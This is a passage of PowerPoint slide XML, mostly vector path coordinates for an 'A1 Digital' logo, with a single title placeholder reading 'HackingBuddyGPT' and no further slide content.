                <a:gd name="connsiteX152" fmla="*/ 627228 w 4182422"/>
                <a:gd name="connsiteY152" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX153" fmla="*/ 730401 w 4182422"/>
                <a:gd name="connsiteY153" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX154" fmla="*/ 730401 w 4182422"/>
                <a:gd name="connsiteY154" fmla="*/ 99437 h 941357"/>
                <a:gd name="connsiteX155" fmla="*/ 625402 w 4182422"/>
                <a:gd name="connsiteY155" fmla="*/ 140311 h 941357"/>
                <a:gd name="connsiteX156" fmla="*/ 597510 w 4182422"/>
                <a:gd name="connsiteY156" fmla="*/ 66914 h 94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182422" h="941357">
                  <a:moveTo>
                    <a:pt x="3600394" y="545242"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3534369" y="545242"/>
                    <a:pt x="3512056" y="559193"/>
                    <a:pt x="3512056" y="599184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3512056" y="607533"/>
                    <a:pt x="3513935" y="615910"/>
                    <a:pt x="3516701" y="622437"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3525078" y="643806"/>
                    <a:pt x="3544625" y="651261"/>
                    <a:pt x="3588311" y="651261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3634816" y="651261"/>
                    <a:pt x="3666445" y="641940"/>
                    <a:pt x="3687819" y="623348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3701781" y="611250"/>
                    <a:pt x="3705512" y="601959"/>
                    <a:pt x="3705512" y="574988"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3705512" y="549872"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3675736" y="547095"/>
                    <a:pt x="3629231" y="545242"/>
                    <a:pt x="3600394" y="545242"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2419807" y="371294"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2405871" y="371294"/>
                    <a:pt x="2391910" y="374071"/>
                    <a:pt x="2380740" y="378729"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2336114" y="397323"/>
                    <a:pt x="2311948" y="443828"/>
                    <a:pt x="2311948" y="507071"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2311948" y="525663"/>
                    <a:pt x="2314715" y="544255"/>
                    <a:pt x="2319386" y="560072"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2332383" y="606576"/>
                    <a:pt x="2371450" y="635403"/>
                    <a:pt x="2421660" y="635403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2490503" y="635403"/>
                    <a:pt x="2536069" y="585180"/>
                    <a:pt x="2536069" y="507983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2536069" y="425236"/>
                    <a:pt x="2490503" y="371294"/>
                    <a:pt x="2419807" y="371294"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2771158" y="283028"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2953445" y="283028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2953445" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016678" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016678" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764635" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764635" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835331" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835331" y="384399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2771158" y="384399"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1904769" y="283028"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2087043" y="283028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087043" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150294" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150294" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898246" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898246" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968924" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968924" y="384399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1904769" y="384399"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3615295" y="270888"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3639461" y="270888"/>
                    <a:pt x="3663653" y="272754"/>
                    <a:pt x="3685026" y="275531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3748260" y="284849"/>
                    <a:pt x="3789179" y="311820"/>
                    <a:pt x="3807787" y="357386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3818956" y="383415"/>
                    <a:pt x="3822687" y="412239"/>
                    <a:pt x="3822687" y="468045"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3822687" y="635446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885920" y="635446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885920" y="736816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3716656" y="736816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3716656" y="693107"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3676675" y="732155"/>
                    <a:pt x="3630170" y="749825"/>
                    <a:pt x="3563206" y="749825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3454382" y="749825"/>
                    <a:pt x="3393942" y="697747"/>
                    <a:pt x="3393942" y="603815"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3393942" y="549872"/>
                    <a:pt x="3414402" y="508970"/>
                    <a:pt x="3452529" y="483862"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3479488" y="467124"/>
                    <a:pt x="3525078" y="457833"/>
                    <a:pt x="3587372" y="457833"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3649691" y="459686"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3657129" y="459686"/>
                    <a:pt x="3686880" y="461552"/>
                    <a:pt x="3702694" y="462463"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3702694" y="442018"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3702694" y="409462"/>
                    <a:pt x="3699927" y="399230"/>
                    <a:pt x="3690611" y="388076"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3677589" y="374114"/>
                    <a:pt x="3651570" y="366677"/>
                    <a:pt x="3612503" y="366677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3605065" y="366677"/>
                    <a:pt x="3597628" y="366677"/>
                    <a:pt x="3590190" y="367618"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3554829" y="372259"/>
                    <a:pt x="3543685" y="383415"/>
                    <a:pt x="3539954" y="420619"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3430216" y="420619"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3433922" y="312734"/>
                    <a:pt x="3485098" y="270888"/>
                    <a:pt x="3615295" y="270888"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2404018" y="269903"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2464433" y="269903"/>
                    <a:pt x="2504439" y="286662"/>
                    <a:pt x="2547213" y="331283"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2547213" y="282943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718330" y="282943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718330" y="384314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654158" y="384314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654158" y="692121"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2654158" y="785132"/>
                    <a:pt x="2644867" y="826977"/>
                    <a:pt x="2616030" y="866968"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2578842" y="918134"/>
                    <a:pt x="2518376" y="941357"/>
                    <a:pt x="2423513" y="941357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2284025" y="941357"/>
                    <a:pt x="2230083" y="899512"/>
                    <a:pt x="2226352" y="789773"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2336114" y="789773"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2342638" y="831637"/>
                    <a:pt x="2363987" y="844657"/>
                    <a:pt x="2423513" y="844657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2476542" y="844657"/>
                    <a:pt x="2505379" y="830695"/>
                    <a:pt x="2522107" y="797229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2533251" y="774899"/>
                    <a:pt x="2536069" y="754443"/>
                    <a:pt x="2536069" y="705141"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2536069" y="688403"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2492356" y="724675"/>
                    <a:pt x="2456057" y="737714"/>
                    <a:pt x="2401201" y="737714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2275648" y="737714"/>
                    <a:pt x="2191955" y="646557"/>
                    <a:pt x="2191955" y="507983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2191955" y="476381"/>
                    <a:pt x="2196626" y="445691"/>
                    <a:pt x="2204978" y="416857"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2231936" y="325711"/>
                    <a:pt x="2307278" y="269903"/>
                    <a:pt x="2404018" y="269903"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="338260" y="189573"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="245317" y="446957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431200" y="446957"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1408353" y="168636"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1408353" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1469732" y="635494"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1624121" y="635494"/>
                    <a:pt x="1715247" y="549006"/>
                    <a:pt x="1715247" y="402075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1715247" y="256063"/>
                    <a:pt x="1624121" y="168636"/>
                    <a:pt x="1469732" y="168636"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3116056" y="135153"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="135153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343908" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343908" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="558285"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3233231" y="619662"/>
                    <a:pt x="3243486" y="634537"/>
                    <a:pt x="3285320" y="635479"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3344847" y="635479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3344847" y="736848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3284381" y="736848"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3167206" y="736848"/>
                    <a:pt x="3116056" y="690343"/>
                    <a:pt x="3116056" y="580595"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3116056" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3049091" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3049091" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3116056" y="283019"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2833452" y="95151"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2954359" y="95151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954359" y="220706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833452" y="220706"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1967060" y="95151"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2087965" y="95151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087965" y="220706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1967060" y="220706"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="275065" y="67826"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="401442" y="67826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625402" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677400" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677400" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437686" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437686" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501792" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468335" y="545452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209085" y="545452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175639" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239765" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239765" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52059" y="635588"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3936902" y="67265"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4119164" y="67265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4119164" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4182422" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4182422" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930378" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930378" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4001074" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4001074" y="168636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3936902" y="168636"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1221438" y="67265"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1475304" y="67265"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1593431" y="67265"/>
                    <a:pt x="1673403" y="91441"/>
                    <a:pt x="1736636" y="147236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1804540" y="206761"/>
                    <a:pt x="1839860" y="293249"/>
                    <a:pt x="1839860" y="402075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1839860" y="431821"/>
                    <a:pt x="1837085" y="461600"/>
                    <a:pt x="1831511" y="489482"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1811977" y="580610"/>
                    <a:pt x="1763607" y="649456"/>
                    <a:pt x="1686412" y="692212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1631559" y="722902"/>
                    <a:pt x="1564597" y="736863"/>
                    <a:pt x="1475304" y="736863"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285595" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285595" y="168636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="168636"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="750838" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="832594" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="832594" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935759" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935759" y="456258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627228" y="456258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627228" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730401" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730401" y="99437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625402" y="140311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597510" y="669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latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2861251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AE5DF-1A88-6952-F4E0-DB301EA358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3956C7-897B-E54C-6664-17700EDBD05F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-76200" y="4617424"/>
            <a:ext cx="11520000" cy="2628000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>HackingBuddyGPT</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="A1DigitalIdentifier_weiss">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6809B74D-9076-0233-188D-A2BC1EC1F347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10498725" y="6538582"/>
            <a:ext cx="1267004" cy="273601"/>
            <a:chOff x="6992830" y="2371951"/>
            <a:chExt cx="4613275" cy="996206"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freihandform: Form 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FE89E56-18FE-F43F-659A-332D7E9C858F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6992830" y="2371951"/>
              <a:ext cx="122659" cy="914341"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 122659"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 914341"/>
                <a:gd name="connsiteX1" fmla="*/ 122659 w 122659"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 914341"/>
                <a:gd name="connsiteX2" fmla="*/ 122659 w 122659"/>
                <a:gd name="connsiteY2" fmla="*/ 914341 h 914341"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 122659"/>
                <a:gd name="connsiteY3" fmla="*/ 914341 h 914341"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="122659" h="914341">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="122659" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122659" y="914341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="9143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latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freihandform: Form 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AE9A1F0-7945-75A9-447A-8117BA77CB28}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7423683" y="2426800"/>
              <a:ext cx="4182422" cy="941357"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3600394 w 4182422"/>
                <a:gd name="connsiteY0" fmla="*/ 545242 h 941357"/>
                <a:gd name="connsiteX1" fmla="*/ 3512056 w 4182422"/>
                <a:gd name="connsiteY1" fmla="*/ 599184 h 941357"/>
                <a:gd name="connsiteX2" fmla="*/ 3516701 w 4182422"/>
                <a:gd name="connsiteY2" fmla="*/ 622437 h 941357"/>
                <a:gd name="connsiteX3" fmla="*/ 3588311 w 4182422"/>
                <a:gd name="connsiteY3" fmla="*/ 651261 h 941357"/>
                <a:gd name="connsiteX4" fmla="*/ 3687819 w 4182422"/>
                <a:gd name="connsiteY4" fmla="*/ 623348 h 941357"/>
                <a:gd name="connsiteX5" fmla="*/ 3705512 w 4182422"/>
                <a:gd name="connsiteY5" fmla="*/ 574988 h 941357"/>
                <a:gd name="connsiteX6" fmla="*/ 3705512 w 4182422"/>
                <a:gd name="connsiteY6" fmla="*/ 549872 h 941357"/>
                <a:gd name="connsiteX7" fmla="*/ 3600394 w 4182422"/>
                <a:gd name="connsiteY7" fmla="*/ 545242 h 941357"/>
                <a:gd name="connsiteX8" fmla="*/ 2419807 w 4182422"/>
                <a:gd name="connsiteY8" fmla="*/ 371294 h 941357"/>
                <a:gd name="connsiteX9" fmla="*/ 2380740 w 4182422"/>
                <a:gd name="connsiteY9" fmla="*/ 378729 h 941357"/>
                <a:gd name="connsiteX10" fmla="*/ 2311948 w 4182422"/>
                <a:gd name="connsiteY10" fmla="*/ 507071 h 941357"/>
                <a:gd name="connsiteX11" fmla="*/ 2319386 w 4182422"/>
                <a:gd name="connsiteY11" fmla="*/ 560072 h 941357"/>
                <a:gd name="connsiteX12" fmla="*/ 2421660 w 4182422"/>
                <a:gd name="connsiteY12" fmla="*/ 635403 h 941357"/>
                <a:gd name="connsiteX13" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY13" fmla="*/ 507983 h 941357"/>
                <a:gd name="connsiteX14" fmla="*/ 2419807 w 4182422"/>
                <a:gd name="connsiteY14" fmla="*/ 371294 h 941357"/>
                <a:gd name="connsiteX15" fmla="*/ 2771158 w 4182422"/>
                <a:gd name="connsiteY15" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX16" fmla="*/ 2953445 w 4182422"/>
                <a:gd name="connsiteY16" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX17" fmla="*/ 2953445 w 4182422"/>
                <a:gd name="connsiteY17" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX18" fmla="*/ 3016678 w 4182422"/>
                <a:gd name="connsiteY18" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX19" fmla="*/ 3016678 w 4182422"/>
                <a:gd name="connsiteY19" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX20" fmla="*/ 2764635 w 4182422"/>
                <a:gd name="connsiteY20" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX21" fmla="*/ 2764635 w 4182422"/>
                <a:gd name="connsiteY21" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX22" fmla="*/ 2835331 w 4182422"/>
                <a:gd name="connsiteY22" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX23" fmla="*/ 2835331 w 4182422"/>
                <a:gd name="connsiteY23" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX24" fmla="*/ 2771158 w 4182422"/>
                <a:gd name="connsiteY24" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX25" fmla="*/ 1904769 w 4182422"/>
                <a:gd name="connsiteY25" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX26" fmla="*/ 2087043 w 4182422"/>
                <a:gd name="connsiteY26" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX27" fmla="*/ 2087043 w 4182422"/>
                <a:gd name="connsiteY27" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX28" fmla="*/ 2150294 w 4182422"/>
                <a:gd name="connsiteY28" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX29" fmla="*/ 2150294 w 4182422"/>
                <a:gd name="connsiteY29" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX30" fmla="*/ 1898246 w 4182422"/>
                <a:gd name="connsiteY30" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX31" fmla="*/ 1898246 w 4182422"/>
                <a:gd name="connsiteY31" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX32" fmla="*/ 1968924 w 4182422"/>
                <a:gd name="connsiteY32" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX33" fmla="*/ 1968924 w 4182422"/>
                <a:gd name="connsiteY33" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX34" fmla="*/ 1904769 w 4182422"/>
                <a:gd name="connsiteY34" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX35" fmla="*/ 3615295 w 4182422"/>
                <a:gd name="connsiteY35" fmla="*/ 270888 h 941357"/>
                <a:gd name="connsiteX36" fmla="*/ 3685026 w 4182422"/>
                <a:gd name="connsiteY36" fmla="*/ 275531 h 941357"/>
                <a:gd name="connsiteX37" fmla="*/ 3807787 w 4182422"/>
                <a:gd name="connsiteY37" fmla="*/ 357386 h 941357"/>
                <a:gd name="connsiteX38" fmla="*/ 3822687 w 4182422"/>
                <a:gd name="connsiteY38" fmla="*/ 468045 h 941357"/>
                <a:gd name="connsiteX39" fmla="*/ 3822687 w 4182422"/>
                <a:gd name="connsiteY39" fmla="*/ 635446 h 941357"/>
                <a:gd name="connsiteX40" fmla="*/ 3885920 w 4182422"/>
                <a:gd name="connsiteY40" fmla="*/ 635446 h 941357"/>
                <a:gd name="connsiteX41" fmla="*/ 3885920 w 4182422"/>
                <a:gd name="connsiteY41" fmla="*/ 736816 h 941357"/>
                <a:gd name="connsiteX42" fmla="*/ 3716656 w 4182422"/>
                <a:gd name="connsiteY42" fmla="*/ 736816 h 941357"/>
                <a:gd name="connsiteX43" fmla="*/ 3716656 w 4182422"/>
                <a:gd name="connsiteY43" fmla="*/ 693107 h 941357"/>
                <a:gd name="connsiteX44" fmla="*/ 3563206 w 4182422"/>
                <a:gd name="connsiteY44" fmla="*/ 749825 h 941357"/>
                <a:gd name="connsiteX45" fmla="*/ 3393942 w 4182422"/>
